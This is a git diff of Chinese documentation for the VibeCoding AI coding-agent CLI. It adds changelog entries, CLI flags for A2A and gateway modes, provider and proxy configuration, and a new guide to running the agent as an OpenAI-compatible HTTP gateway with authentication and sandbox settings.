+  - `cli-reference.md`：新增 `--enable-a2a-master`、`--init-a2a-master-config`、
+    `--init-gateway`、`--force`、`a2a` 子命令文档
+  - `README.md`：架构图补全、新增运行模式总览
+
+- **压力系统**
+  - Context Pressure：55% context 使用率时触发 `EventContextPressure`（可通过 `context_pressure_threshold` 配置）
+  - Budget Pressure：剩余 20% 迭代时触发 `EventBudgetPressure`（可通过 `budget_pressure_threshold` 配置）
+  - 一次性触发：每个阈值越界只触发一次，非每轮触发
+  - 消息平台通过进度回调接收压力警告
+
+- **智能审批（分级策略）**
+  - low 风险：自动批准
+  - medium 风险：自动批准 + 通知用户
+  - high 风险（WebSocket）：发送 `approval_request`，等待用户 `approval_response`（5 分钟超时）
+  - high 风险（消息平台）：自动拒绝 + 通知用户
+  - 命令风险分类：基于 bash 命令模式的 low/medium/high 分级
+
+- **Provider/Model 配置**
+  - `hermes.json` 新增 `default_provider` / `default_model`（覆盖 `settings.json`）
+  - `hermes start` 新增 `-p`/`--provider` 和 `-m`/`--model` CLI 标志
+  - 优先级：CLI 标志 > `hermes.json` > `settings.json`
+
+- **多 Agent 模式** (`--multi-agent`)
+  - 启用子 Agent 工具（spawn/status/send/destroy）
+  - 通过 `hermes.json` 的 `multi_agent` 字段或 `--multi-agent` CLI 标志配置
+
+- **Sandbox 模式** (`--sandbox`)
+  - 可选 bwrap 沙箱隔离（默认关闭）
+  - 通过 `hermes.json` 的 `sandbox` 字段或 `--sandbox` CLI 标志配置
+
+- **MCP 工具继承**
+  - Hermes 自动加载全局/项目 `mcp.json` 中的 MCP 服务器
+  - MCP 工具按 session 注册，session 移除时自动关闭连接
+
+- **消息平台进度事件推送**
+  - agent 执行过程中实时向微信/飞书推送工具执行进度
+  - 格式：`[tool]: args ✅/❌`（工具）、`💭 ...`（思考过程）
+  - agent 完成后发送完整总结
+
+- **memory 工具**
+  - `memory` 工具支持 read/add/update/delete 操作
+  - section 级操作（User Profile、Working Memory、Lessons Learned）
+  - 默认写入 `.vibe/memory.md`（项目目录）
+  - 查找优先级：`memory.path` 配置 → `.vibe/memory.md` → `<GLOBAL_DIR>/memory.md`
+  - `/api/memory` HTTP 端点（GET/PUT）用于 memory 访问
+
+- **Hermes CLI 命令**
+  - `hermes start` — 启动守护进程（支持所有 CLI 标志）
+  - `hermes stop` — 通过 PID 文件 + SIGTERM 停止守护进程
+  - `hermes status` — 通过 PID + HTTP health 检查守护进程状态
+  - `hermes client` — WebSocket 客户端（流式输出 + 斜杠命令）
+  - `hermes config init/show` — 配置管理
+  - `hermes wechat login/status` — 微信 iLink 管理
+  - `hermes feishu setup/status` — 飞书配置
+  - `hermes webhook list` — webhook 路由查看
+  - `hermes memory show/clear` — memory 管理
+  - `hermes sessions list` — 活跃 session 列表（查询运行实例）
+  - `hermes cron list/add/remove/enable/disable` — 定时任务管理
+  - `a2a start/stop/status/card` — A2A 服务器管理
+
+### 📝 变更
+
+- 微信 iLink 协议实现，零外部依赖（5 个文件：types/protocol/auth/crypto/wechat）
+- 飞书 Bot 使用官方 SDK + WebSocket 长连接
+- Shell Hooks 支持 pre/post tool call 外部脚本（JSON stdin/stdout）
+- Webhook 入站路由，支持 HMAC-SHA256 签名验证
+- WebSocket 使用 `golang.org/x/net/websocket`（标准库兼容）
+- 基于 PID 文件的守护进程管理（hermes stop/status）
+
+### 🐛 问题修复
+
+- **NPM 安装包修复**
+  - 修复发布流水线，确保 `vibecoding-installer` 始终包含可执行入口 `bin/vibecoding`。
+  - 新增 `scripts/npm-installer-wrapper.js` 作为统一的 wrapper 逻辑源，并被 `scripts/build-npm.sh`
+    与 `scripts/build-npm-packages.sh` 复用，避免实现分叉。
+  - 调整 `npm/.npmignore` 与 `npm/bin` 的处理方式，避免误打包非发布文件，并通过 `files` 字段显式声明要发布内容。
+
+- **Hermes Webhook 投递与过滤**
+  - 当 webhook 路由无法识别事件类型时，除非显式允许 `*`，否则按不匹配处理。
+  - 为 webhook 路由新增 `delivery_target`，让微信/飞书投递拥有明确接收者。
+  - 路由列表和配置模板会在存在投递目标时一并展示。
+
+- **OpenAI Responses thinking 映射**
+  - 将 `--thinking xhigh` 在 OpenAI Responses API 中映射为 `reasoning.effort: "high"`。
+
+### 🧪 测试
+
+- 将 webhook router 测试改为等待 handler 完成，去掉 `time.Sleep` 带来的竞态和不稳定。
+- 增加无法推断事件类型时的 webhook 拒收测试。
+- 增加 webhook delivery target 相关测试覆盖。
+
+## v0.1.26
+
+### ✨ 新功能
+
+- **Gateway 模式** (`vibecoding gateway`)
+  - 新增 HTTP 服务，对外暴露标准 OpenAI Chat Completions API (`/v1/chat/completions`、`/v1/models`、`/health`)
+  - 任何兼容 OpenAI SDK 的客户端（Cursor、Continue、Open WebUI、Python SDK 等）可直接接入
+  - 完整支持 Streaming (SSE) 和 Non-streaming 响应
+  - 后端由 VibeCoding agent 循环驱动，tool 执行对调用方透明
+
+- **多 Session 支持**
+  - 内置 `SessionPool` 支持并发 session，每个 session 拥有独立的 agent、工具和消息历史
+  - 通过请求体中的 `x_session_id` 关联 session，未指定时自动创建
+  - 可配置空闲超时 (`session.idleTimeoutSeconds`) 和最大 session 数 (`session.maxSessions`)
+
+- **Gateway Sub-Agent 支持**
+  - 可选 `enableSubAgents` 配置，在 gateway 模式下启用多 Agent 编排
+  - 复用现有 `AgentFactory` / `AgentManager` / 子Agent 工具，无需改动核心 agent 逻辑
+
+- **Bearer Token 认证**
+  - 通过 `gateway.json` 的 `auth.enabled` 和 `auth.tokens` 列表配置
+  - 默认关闭；`/health` 端点始终不需认证
+
+- **API 指令系统 (Slash Commands)**
+  - `/clear`、`/mode`、`/model`、`/models`、`/sessions`、`/compact`、`/status`、`/skill`、`/skills`、`/help`
+  - 当最后一条用户消息以 `/` 开头时触发，在 gateway 层直接处理，不调用 LLM
+  - 响应使用标准 OpenAI 格式，附加 `x_command` 扩展字段
+
+- **Tool 可见性配置** (`toolVisibility.mode`)
+  - `"content"` (默认): streaming 时通过 `content` 字段发送 tool 状态文本
+  - `"sse_event"`: 通过扩展 SSE event 发送，适合自定义客户端
+  - `"none"`: 完全透明，客户端只见最终文本
+
+- **System Prompt 处理策略** (`systemPromptMode`)
+  - `"append"` (默认): 客户端 system message 追加到内置 system prompt 末尾
+  - `"ignore"`: 完全忽略客户端 system message
+
+- **安全: allowedWorkDirs 白名单**
+  - 请求级 `x_working_dir` 的目录白名单，支持路径分隔符感知的前缀匹配
+  - 三层安全模型: L1 认证 + L2 目录管控 + L3 沙箱 (bwrap)
+
+- **Gateway Sandbox 支持**
+  - 通过 `gateway.json` 的 `sandbox.enabled` / `sandbox.level` 或 `--sandbox` flag 配置
+  - 细节配置（allowedRead、deniedPaths 等）继承 `settings.json`
+
+- **Gateway 配置文件** (`gateway.json`)
+  - 独立配置文件，位于 `~/.vibecoding/gateway.json`
+  - 覆盖: 监听地址、认证、模式、沙箱、工作目录、目录白名单、session 管理、CORS、tool 可见性、system prompt 策略、请求超时、并发限制、日志
+  - `vibecoding --init-gateway` 生成配置模板；`--force` 强制覆盖
+
+- **请求超时与并发控制**
+  - `requestTimeoutSeconds` (默认 1800s)；streaming 有数据流动不超时
+  - `maxConcurrentRequests` (默认 0 = 不限制)
+
+### 📝 文档
+
+- 新增 `docs/gateway-proposal.md`，包含完整架构、API 设计、安全模型和实现计划
+- 更新 `AGENTS.md` 版本标注
+
 ## v0.1.25
 
 ### ✨ 新功能
@@ -76,7 +464,7 @@
   - 补充缺失配置项：`cacheControl`、空闲压缩、完整沙箱字段（`bwrapPath`、`allowedRead`、`allowedWrite`、`deniedPaths`、`passEnv`、`tmpSize`）、`shellPath`、`shellCommandPrefix`、`sessionDir`、`skillsDir`、`theme`、`retry`
   - 记录 shell 命令格式的 `apiKey`（`!cmd`），支持密码管理器集成
   - 修正密钥解析顺序：优先使用配置中的 `apiKey`，其次使用推导的环境变量
-  - 修正 macOS 配置路径：`~/Library/Application Support/vibecoding/`
+  - 更新 macOS 配置路径文档
   - 新增顶层字段参考表及所有默认值
   - 新增各平台沙箱路径与环境变量默认值
   - 改进示例：Claude provider `cacheControl`、空闲压缩、项目级覆盖、自定义沙箱路径
@@ -895,4 +1283,4 @@
 
 ---
 
-**完整变更日志**: https://github.com/startvibecoding/vibecoding/compare/v0.0.1...v0.0.7
+**完整变更日志**: https://github.com/startvibecoding/vibecoding/compare/v0.1.26...v0.1.27
diff --git a/docs/zh/cli-reference.md b/docs/zh/cli-reference.md
index 7da2e55..03013d9 100644
--- a/docs/zh/cli-reference.md
+++ b/docs/zh/cli-reference.md
@@ -47,6 +47,10 @@ vibecoding [flags] [message...]
 
 | 参数 | 简写 | 描述 |
 |------|------|------|
+| `--init-gateway` | - | 生成 `gateway.json` 配置模板 |
+| `--init-a2a-master-config` | - | 生成 `a2a-list.json` 配置模板 |
+| `--enable-a2a-master` | - | 启用 A2A Master 模式（远程 agent 调度） |
+| `--force` | - | 覆盖已存在的配置文件（配合 `--init-*` 使用） |
 | `--version` | `-v` | 显示版本 |
 | `--help` | `-h` | 显示帮助 |
 
@@ -75,6 +79,27 @@ vibecoding acp [flags]
 
 详见 [ACP 协议](acp.md) 文档了解 IDE 集成细节。
 
+### `a2a` - A2A 协议服务器
+
+运行 A2A (Agent-to-Agent) 协议服务器，支持独立模式和集成模式。
+
+```
+vibecoding a2a [command]
+```
+
+| 子命令 | 描述 |
+|--------|------|
+| `start` | 启动 A2A 服务器 |
+| `stop` | 停止 A2A 服务器 |
+| `status` | 查看服务器状态 |
+| `card` | 显示/生成 Agent Card |
+| `send <message>` | 向远程 A2A 服务器发送任务 |
+| `discover <url>` | 发现远程 Agent Card |
+| `--init-a2a-config` | 生成 `a2a.json` 配置模板 |
+| `--force` | 覆盖已存在的配置文件 |
+
+详见 [A2A 协议](a2a.md) 文档。
+
 ## 使用示例
 
 ### 基本使用
@@ -128,6 +153,37 @@ vibecoding acp --multi-agent
 
 启用后，VibeCoding 会注册 `subagent_*` 工具，并支持后台委托调查等多 Agent 工作流。Cron 命令入口也依赖多 Agent 模式。
 
+### A2A Master 模式
+
+```bash
+# 生成示例配置
+vibecoding --init-a2a-master-config
+
+# 启用 master 模式
+vibecoding --enable-a2a-master
+
+# 启用 master 模式 + 详细日志
+vibecoding --enable-a2a-master --verbose
+```
+
+启用后，VibeCoding 会加载 `a2a-list.json` 中的远程 agent 列表，注册 `a2a_dispatch` tool，LLM 可自动向远程 agent 分发任务。
+
+### 初始化配置
+
+```bash
+# 生成 gateway.json 模板
+vibecoding --init-gateway
+
+# 生成 a2a.json 模板
+vibecoding a2a --init-a2a-config
+
+# 生成 a2a-list.json 模板
+vibecoding --init-a2a-master-config
+
+# 强制覆盖已存在的文件
+vibecoding --init-gateway --force
+```
+
 ### 思考级别
 
 ```bash
diff --git a/docs/zh/configuration.md b/docs/zh/configuration.md
index 9224abf..a9fa8ef 100644
--- a/docs/zh/configuration.md
+++ b/docs/zh/configuration.md
@@ -6,8 +6,7 @@ VibeCoding 使用两个配置文件:
 
 | 文件 | 平台 | 范围 | 优先级 |
 |------|------|------|--------|
-| `~/.vibecoding/settings.json` | Linux | 全局 (所有项目) | 低 |
-| `~/Library/Application Support/vibecoding/settings.json` | macOS | 全局 (所有项目) | 低 |
+| `~/.vibecoding/settings.json` | Linux/macOS | 全局 (所有项目) | 低 |
 | `%APPDATA%\vibecoding\settings.json` | Windows | 全局 (所有项目) | 低 |
 | `.vibe/settings.json` | 全部 | 项目级 | 高 |
 
@@ -143,6 +142,7 @@ VibeCoding 使用两个配置文件:
 | `theme` | string | `"dark"` | UI 主题: `"dark"` 或 `"light"` |
 | `retry` | object | *(见下文)* | API 调用重试设置 |
 | `approval` | object | *(见下文)* | Bash 命令审批设置 |
+| `webSearch` | object | *(见下文)* | Hosted web search 设置 |
 
 ---
 
@@ -157,7 +157,8 @@ VibeCoding 使用两个配置文件:
 | `baseUrl` | string | ✓ | — | API 基础 URL |
 | `vendor` | string | — | 自动检测 | 可选厂商适配器名称 (见下文) |
 | `apiKey` | string | — | `""` | API 密钥 (见[认证配置](#认证配置)) |
-| `api` | string | — | 自动检测 | API 协议: `"openai-chat"` 或 `"anthropic-messages"` |
+| `api` | string | — | 自动检测 | API 协议: `"openai-chat"`、`"openai-responses"`、`"anthropic-messages"`、`"google-gemini"` 或 `"google-vertex"` |
+| `httpProxy` | string | — | `""` | 可选的 provider 级 HTTP 代理 URL，例如 `"http://127.0.0.1:7890"` |
 | `thinkingFormat` | string | — | 自动检测 | 思考参数格式 (见下文) |
 | `cacheControl` | bool | — | `false` | 启用 Anthropic 提示缓存；使用 Claude 模型时设为 `true` |
 | `models` | array | — | `[]` | 可用模型列表 |
@@ -170,9 +171,9 @@ VibeCoding 使用两个配置文件:
 
 1. 显式 `vendor`
 2. `baseUrl` 自动识别
-3. 通用 fallback：`openai-chat` 或 `anthropic-messages`
+3. 通用 fallback：`openai-chat`、`openai-responses`、`anthropic-messages`、`google-gemini` 或 `google-vertex`
 
-内置厂商适配器包括 `openai`、`anthropic`、`claude`、`deepseek`、`xiaomi`、`xiaomi-token-plan-ams`、`xiaomi-token-plan-cn`、`xiaomi-token-plan-sgp`、`kimi`、`minimax`、`seed`、`qianfan`、`bailian`、`gitee`、`openrouter`、`together`、`groq` 和 `fireworks`。
+内置厂商适配器包括 `openai`、`anthropic`、`claude`、`deepseek`、`google-gemini`、`google-vertex`、`xiaomi`、`xiaomi-token-plan-ams`、`xiaomi-token-plan-cn`、`xiaomi-token-plan-sgp`、`kimi`、`minimax`、`seed`、`qianfan`、`bailian`、`gitee`、`openrouter`、`together`、`groq` 和 `fireworks`。
 
 ```json
 {
@@ -190,19 +191,75 @@ VibeCoding 使用两个配置文件:
 }
 ```
 
+### webSearch
+
+Hosted web search 设置。默认关闭。
+
+| 字段 | 类型 | 必填 | 默认值 | 描述 |
+|------|------|------|--------|------|
+| `enabled` | bool | — | `false` | 启用 hosted web search 注册 |
+| `provider` | string | — | `defaultProvider` | 用于 web search 的 provider 配置名称 |
+| `providerType` | string | — | 自动 | Hosted tool 类型，通常是 `responses` 或 `messages` |
+| `model` | string | — | `""` | 可选 metadata，用于路由、展示或未来 provider-specific 处理 |
+
+```json
+{
+  "webSearch": {
+    "enabled": true,
+    "provider": "gpt",
+    "providerType": "responses",
+    "model": "gpt-5.4"
+  }
+}
+```
+
+当 `provider` 指向一个已配置的 provider 名称时，VibeCoding 会先解析该 provider 的 `baseUrl`、`api` 和 vendor 行为，再注册 hosted search tool。
+
 #### api 字段
 
 `api` 字段指定的是**协议格式**，而非服务商。你可以将任意提供商指向任意兼容的端点：
 
 - `openai-chat`: OpenAI Chat Completions API 格式
+- `openai-responses`: OpenAI Responses API 格式 (`POST /v1/responses`)
 - `anthropic-messages`: Anthropic Messages API 格式
+- `google-gemini`: 原生 Gemini API `streamGenerateContent` 格式
+- `google-vertex`: 原生 Vertex AI Gemini `streamGenerateContent` 格式
 
 例如，DeepSeek 在不同端点提供两种格式，你也可以用这些格式去连接真正的 OpenAI 或 Anthropic 服务。
 
 如果未指定，会根据 `baseUrl` 自动检测：
+- 包含 `generativelanguage.googleapis.com` → `google-gemini`
+- 包含 `aiplatform.googleapis.com` → `google-vertex`
 - 包含 "anthropic" → `anthropic-messages`
 - 其他 → `openai-chat`
 
+Google 原生 provider 可以直接配置：
+
+```json
+{
+  "providers": {
+    "google-gemini": {
+      "baseUrl": "https://generativelanguage.googleapis.com/v1beta/models",
+      "apiKey": "${GOOGLE_API_KEY}",
+      "api": "google-gemini",
+      "models": [
+        { "id": "gemini-2.5-flash", "name": "Gemini 2.5 Flash", "reasoning": true, "contextWindow": 1000000, "maxTokens": 65536 }
+      ]
+    },
+    "google-vertex": {
+      "baseUrl": "https://aiplatform.googleapis.com/v1/projects/YOUR_PROJECT/locations/global/publishers/google/models",
+      "apiKey": "!gcloud auth print-access-token",
+      "api": "google-vertex",
+      "models": [
+        { "id": "gemini-2.5-flash", "name": "Gemini 2.5 Flash", "reasoning": true, "contextWindow": 1000000, "maxTokens": 65536 }
+      ]
+    }
+  }
+}
+```
+
+上面的 `!gcloud auth print-access-token` 示例使用 shell 命令解析。使用 `!command` 值前需要设置 `VIBECODING_ALLOW_SHELL_CONFIG=1`，也可以改用 `${GOOGLE_VERTEX_TOKEN}` 这样的环境变量引用。
+
 #### thinkingFormat 字段
 
 指定思考/推理参数如何发送到 API：
@@ -440,8 +497,7 @@ VibeCoding 会自动搜索并加载以下文件:
 
 | 平台 | 默认值 |
 |------|--------|
-| Linux | `~/.vibecoding/skills` |
-| macOS | `~/Library/Application Support/vibecoding/skills` |
+| Linux/macOS | `~/.vibecoding/skills` |
 | Windows | `%APPDATA%\vibecoding\skills` |
 
 ```json
@@ -577,8 +633,7 @@ VibeCoding 会自动搜索并加载以下文件:
 
 | 平台 | 默认值 |
 |------|--------|
-| Linux | `~/.vibecoding/sessions` |
-| macOS | `~/Library/Application Support/vibecoding/sessions` |
+| Linux/macOS | `~/.vibecoding/sessions` |
 | Windows | `%APPDATA%\vibecoding\sessions` |
 
 ```json
@@ -774,7 +829,7 @@ MCP 服务器配置保存在独立的 `mcp.json` 文件中，不写入 `settings
 
 VibeCoding 启动时会从以下位置加载 MCP 配置：
 
-1. 全局配置：Linux 为 `~/.vibecoding/mcp.json`，macOS 为 `~/Library/Application Support/vibecoding/mcp.json`，Windows 为 `%APPDATA%\vibecoding\mcp.json`
+1. 全局配置：Linux/macOS 为 `~/.vibecoding/mcp.json`，Windows 为 `%APPDATA%\vibecoding\mcp.json`
 2. 项目配置：`.vibe/mcp.json`
 
 可在 TUI 中创建模板：
@@ -841,7 +896,7 @@ VibeCoding 需要某个提供商的 API 密钥时，按以下顺序查找：
 | 格式 | 示例 | 行为 |
 |------|------|------|
 | `${VAR}` | `"${DEEPSEEK_API_KEY}"` | 读取环境变量 `VAR` 的值 |
-| `!command` | `"!pass show deepseek-key"` | 执行 shell 命令，使用其标准输出 |
+| `!command` | `"!pass show deepseek-key"` | 仅当 `VIBECODING_ALLOW_SHELL_CONFIG=1` 时执行 shell 命令，并使用其标准输出 |
 | 纯字符串 | `"sk-abc123..."` | 直接使用 (⚠️ 不建议用于共享配置) |
 
 #### 环境变量引用
@@ -866,6 +921,12 @@ export DEEPSEEK_API_KEY=sk-...
 
 前缀加 `!` 可执行 shell 命令。VibeCoding 在 Linux/macOS 上使用 `sh -c`，在 Windows 上使用 `powershell.exe`。
 
+Shell 命令解析默认关闭。如需在可信本地配置中启用，设置：
+
+```bash
+export VIBECODING_ALLOW_SHELL_CONFIG=1
+```
+
 ```json
 {
   "providers": {
@@ -1000,7 +1061,9 @@ export DEEPSEEK_API_KEY=sk-...
 }
 ```
 
-### 自定义 API 端点 / 代理
+### 自定义 API 端点 / HTTP 代理
+
+`baseUrl` 指向 API 端点或 API 网关；`httpProxy` 只配置该 provider 的网络代理。`httpProxy` 为空时，会保留 Go 默认的 `HTTP_PROXY` / `HTTPS_PROXY` 环境变量行为。
 
 ```json
 {
@@ -1009,6 +1072,7 @@ export DEEPSEEK_API_KEY=sk-...
       "baseUrl": "https://my-proxy.example.com/v1",
       "api": "openai-chat",
       "apiKey": "${MY_PROXY_API_KEY}",
+      "httpProxy": "http://127.0.0.1:7890",
       "models": [
         {
           "id": "gpt-4o",
diff --git a/docs/zh/faq.md b/docs/zh/faq.md
index 7f5a3c8..1404ee2 100644
--- a/docs/zh/faq.md
+++ b/docs/zh/faq.md
@@ -12,7 +12,7 @@ A:
 - DeepSeek (默认): deepseek-v4-flash, deepseek-v4-pro (1M 上下文，最多 384K 输出)
 - OpenAI: GPT-4o, o1 等
 - Anthropic: Claude Sonnet, Opus 等
-- 厂商适配器: 小米、Kimi、MiniMax、Seed、Qianfan、Bailian、Gitee、OpenRouter、Together、Groq、Fireworks 等
+- 厂商适配器: Google Gemini、Google Vertex、小米、Kimi、MiniMax、Seed、Qianfan、Bailian、Gitee、OpenRouter、Together、Groq、Fireworks 等
 - 自定义: 任何 OpenAI Chat 或 Anthropic Messages 兼容 API 端点，会回退到通用 provider
 
 ### Q: 如何安装?
diff --git a/docs/zh/gateway.md b/docs/zh/gateway.md
new file mode 100644
index 0000000..d0f19b5
--- /dev/null
+++ b/docs/zh/gateway.md
@@ -0,0 +1,339 @@
+# Gateway 模式
+
+## 概述
+
+Gateway 模式将 VibeCoding 作为 HTTP 服务运行，对外暴露**标准 OpenAI Chat Completions API**。任何兼容 OpenAI 的客户端 — Cursor、Continue、Open WebUI、Python SDK、自定义脚本 — 都可以直接接入，VibeCoding agent 在后台透明地执行工具调用。
+
+```bash
+vibecoding gateway
+```
+
+## 快速开始
+
+```bash
+# 生成配置模板
+vibecoding --init-gateway
+
+# 启动 gateway（默认 :8080）
+vibecoding gateway
+
+# 测试
+curl http://localhost:8080/v1/chat/completions \
+  -H "Content-Type: application/json" \
+  -d '{
+    "model": "deepseek-v4-flash",
+    "messages": [{"role": "user", "content": "列出当前目录的文件"}],
+    "stream": false
+  }'
+```
+
+## 命令行参数
+
+| 参数 | 说明 |
+|------|------|
+| `--port` | 监听端口（默认：配置文件或 8080） |
+| `--config` | gateway.json 路径 |
+| `--work-dir` | 默认工作目录 |
+| `--provider` / `-p` | 覆盖 provider |
+| `--model` / `-m` | 覆盖 model |
+| `--sandbox` | 启用沙箱（bwrap） |
+| `--multi-agent` | 启用子 Agent 工具 |
+| `--verbose` | 详细输出 |
+| `--debug` | 调试日志 |
+
+## 配置
+
+Gateway 使用独立的配置文件 `gateway.json`，与 `settings.json` 分开。
+
+**配置加载优先级**（从高到低）：
+
+1. CLI `--config /path/to/gateway.json`
+2. `.vibe/gateway.json`（项目级）
+3. `~/.vibecoding/gateway.json`（全局）
+
+生成配置模板：
+
+```bash
+vibecoding --init-gateway
+vibecoding --init-gateway --force  # 强制覆盖
+```
+
+### 完整配置参考
+
+```jsonc
+{
+  "listen": ":8080",
+
+  "auth": {
+    "enabled": false,
+    "tokens": ["sk-your-secret-token"]
+  },
+
+  "defaultMode": "yolo",
+  "defaultThinkingLevel": "medium",
+  "enableSubAgents": false,
+
+  "sandbox": {
+    "enabled": false,
+    "level": ""       // "none", "standard", "strict"；空 = 根据 mode 自动推导
+  },
+
+  "workingDir": "/home/user/projects",
+
+  "allowedWorkDirs": [
+    "/home/user/projects",
+    "/opt/repos"
+  ],
+
+  "session": {
+    "idleTimeoutSeconds": 1800,
+    "maxSessions": 0
+  },
+
+  "toolVisibility": {
+    "mode": "content",      // "content", "sse_event", "none"
+    "detail": "collapsed"   // "collapsed", "expanded"
+  },
+
+  "systemPromptMode": "append",   // "append", "ignore"
+  "requestTimeoutSeconds": 1800,
+  "maxConcurrentRequests": 0,
+
+  "cors": {
+    "enabled": false,
+    "allowOrigins": ["*"]
+  },
+
+  "provider": "",
+  "model": "",
+  "logLevel": "info"
+}
+```
+
+如果 Gateway 监听在非 loopback 地址、默认模式为 `yolo` 且未启用认证，启动时会输出警告。对外部署时应启用 `auth.enabled`、限制 `allowedWorkDirs`，并考虑启用 sandbox。
+
+## API 端点
+
+### POST /v1/chat/completions
+
+标准 OpenAI Chat Completions API，支持流式和非流式。
+
+**请求：**
+
+```json
+{
+  "model": "deepseek-v4-flash",
+  "messages": [
+    {"role": "system", "content": "你是一个编程助手。"},
+    {"role": "user", "content": "读取 main.go 并解释。"}
+  ],
+  "stream": true,
+  "max_tokens": 4096,
+  "x_session_id": "my-session",
+  "x_mode": "yolo",
+  "x_working_dir": "/home/user/project"
+}
+```
+
+扩展字段（`x_*`）为可选：
+
+| 字段 | 说明 |
+|------|------|
+| `x_session_id` | 关联已有 session（省略则新建） |
+| `x_mode` | 覆盖本次请求的 mode |
+| `x_working_dir` | 覆盖工作目录（需通过 `allowedWorkDirs` 校验） |
+
+**非流式响应：**
+
+```json
+{
+  "id": "chatcmpl-xxx",
+  "object": "chat.completion",
+  "created": 1716883200,
+  "model": "deepseek-v4-flash",
+  "choices": [{
+    "index": 0,
+    "message": {"role": "assistant", "content": "以下是代码解释..."},
+    "finish_reason": "stop"
+  }],
+  "usage": {"prompt_tokens": 100, "completion_tokens": 200, "total_tokens": 300},
+  "x_session_id": "my-session",
+  "x_tool_calls": [
+    {"name": "read", "args": {"path": "main.go"}, "status": "completed"}
+  ]
+}
+```
+
+**流式响应**使用标准 SSE 格式，以 `data:` 行发送，`[DONE]` 结束。
+
+### GET /v1/models
+
+返回可用模型列表。
+
+### GET /health
+
+健康检查（无需认证）。
+
+```json
+{"status": "ok", "version": "v0.1.26", "sessions": 3}
+```
+
+## 斜杠指令
+
+当最后一条用户消息以 `/` 开头时，在 gateway 层直接处理，不调用 LLM。
+
+| 指令 | 说明 |
+|------|------|
+| `/clear` | 清空 session 上下文 |
+| `/mode [plan\|agent\|yolo]` | 查看或切换模式 |
+| `/model [model_id]` | 查看或切换模型 |
+| `/models` | 列出可用模型 |
+| `/sessions` | 列出活跃 session |
+| `/sessions del <id>` | 删除 session |
+| `/compact` | 触发上下文压缩 |
+| `/status` | 查看 session 状态 |
+| `/skill <name>` | 激活 skill |
+| `/skills` | 列出可用 skills |
+| `/help` | 显示所有指令 |
+
+指令返回标准 OpenAI 响应格式，`stream: true` 和 `stream: false` 均支持。
+
+## 工具可见性
+
+控制工具执行在响应内容中的展示方式。
+
+### mode
+
+| `toolVisibility.mode` | 行为 |
+|------------------------|------|
+| `content`（默认） | 工具输出混入 content 流 |
+| `sse_event` | 工具输出通过独立的 `event: tool_status` SSE 事件发送 |
+| `none` | 不发送任何工具输出，客户端只见最终文本 |
+
+### detail
+
+| `toolVisibility.detail` | 行为 |
+|--------------------------|------|
+| `collapsed`（默认） | 一行摘要：`🔧 read: main.go ✅` |
+| `expanded` | 完整输出，用代码块包裹并自动检测语言 |
+
+**折叠模式**（默认）：大部分工具显示一行摘要。`edit`/`write` 有 diff 时始终展示 diff。错误始终完整展示。
+
+**展开模式**：工具结果用 fenced code block 包裹，自动检测语言（`.go` → `go`，`.py` → `python`，bash 输出 → `bash`，diff → `diff`）。
+
+## 多 Session
+
+每个请求可通过 `x_session_id` 关联 session。Session 维护独立的 agent 状态、消息历史和工具。
+
+- 无 `x_session_id` → 每请求新建 session（无状态）
+- 有 `x_session_id` → 多轮对话（有状态）
+- Session 超过 `idleTimeoutSeconds` 自动过期
+- 同一 session 内的请求串行处理
+
+## 认证
+
+设置 `auth.enabled: true` 并配置 `auth.tokens`：
+
+```json
+{
+  "auth": {
+    "enabled": true,
+    "tokens": ["sk-token-1", "sk-token-2"]
+  }
+}
+```
+
+客户端发送：`Authorization: Bearer sk-token-1`
+
+`/health` 端点始终不需要认证。
+
+## CORS
+
+启用 CORS 后，Gateway 只返回一个 `Access-Control-Allow-Origin` 值：
+
+- `allowOrigins: ["*"]` 允许任意 origin
+- 否则请求的 `Origin` 必须与配置中的某个 origin 完全匹配
+- 如果请求没有 `Origin` header，且只配置了一个 origin，则返回该 origin
+
+## 安全
+
+三层独立防护：
+
+| 层次 | 机制 | 作用 |
+|------|------|------|
+| L1 | Bearer Token | 阻止未授权访问 |
+| L2 | `allowedWorkDirs` | 限制文件系统操作范围 |
+| L3 | Sandbox (bwrap) | OS 级隔离 |
+
+### allowedWorkDirs
+
+控制 `x_working_dir` 可切换到哪些目录：
+
+- 未设置（`null`）→ 不限制
+- 空 `[]` → 禁止所有切换，只能用 `workingDir`
+- 目录列表 → 路径感知匹配（包含路径分隔符边界）
+
+`workingDir` 本身始终被信任（管理员配置的值）。
+
+## 客户端示例
+
+### Python OpenAI SDK
+
+```python
+from openai import OpenAI
+
+client = OpenAI(
+    base_url="http://localhost:8080/v1",
+    api_key="sk-my-token",  # 如果开启了认证
+)
+
+response = client.chat.completions.create(
+    model="deepseek-v4-flash",
+    messages=[
+        {"role": "user", "content": "读取 main.go 并解释架构。"},
+    ],
+    stream=True,
+)
+
+for chunk in response:
+    if chunk.choices[0].delta.content:
+        print(chunk.choices[0].delta.content, end="")
+```
+
+### 多轮对话（带 session）
+
+```python
+response = client.chat.completions.create(
+    model="deepseek-v4-flash",
+    messages=[{"role": "user", "content": "读取 main.go"}],
+    extra_body={"x_session_id": "my-session"},
+)
+
+response = client.chat.completions.create(
+    model="deepseek-v4-flash",
+    messages=[{"role": "user", "content": "重构错误处理"}],
+    extra_body={"x_session_id": "my-session"},
+)
+```
+
+### curl
+
+```bash
+curl http://localhost:8080/v1/chat/completions \
+  -H "Content-Type: application/json" \
+  -H "Authorization: Bearer sk-my-token" \
+  -d '{
+    "model": "deepseek-v4-flash",
+    "messages": [{"role": "user", "content": "解释 main.go"}],
+    "stream": true
+  }'
+```
+
+## System Prompt 处理
+
+| `systemPromptMode` | 行为 |
+|---------------------|------|
+| `append`（默认） | 客户端 system message 追加到内置 system prompt 末尾 |
+| `ignore` | 忽略客户端 system message |
+
+内置 system prompt 包含工具定义、模式指令和上下文文件。`append` 模式保留所有内置内容，同时接受客户端自定义指令。
diff --git a/docs/zh/getting-started.md b/docs/zh/getting-started.md
index 6deee16..6848bb1 100644
--- a/docs/zh/getting-started.md
+++ b/docs/zh/getting-started.md
@@ -144,6 +144,18 @@ vibecoding acp --multi-agent
 
 多 Agent 模式会注册 `subagent_*` 工具，用于委托边界清晰的任务。TUI 多 Agent 工作流中也提供 cron 命令入口。
 
+### A2A Master 模式
+
+```bash
+# 生成示例配置
+vibecoding --init-a2a-master-config
+
+# 启用 master 模式
+vibecoding --enable-a2a-master
+```
+
+A2A Master 模式让你管理多个远程 A2A Agent，LLM 可自动通过 `a2a_dispatch` tool 分发任务。详见 [A2A 协议](a2a.md)。
+
 ## 选择模式
 
 VibeCoding 提供三种模式:
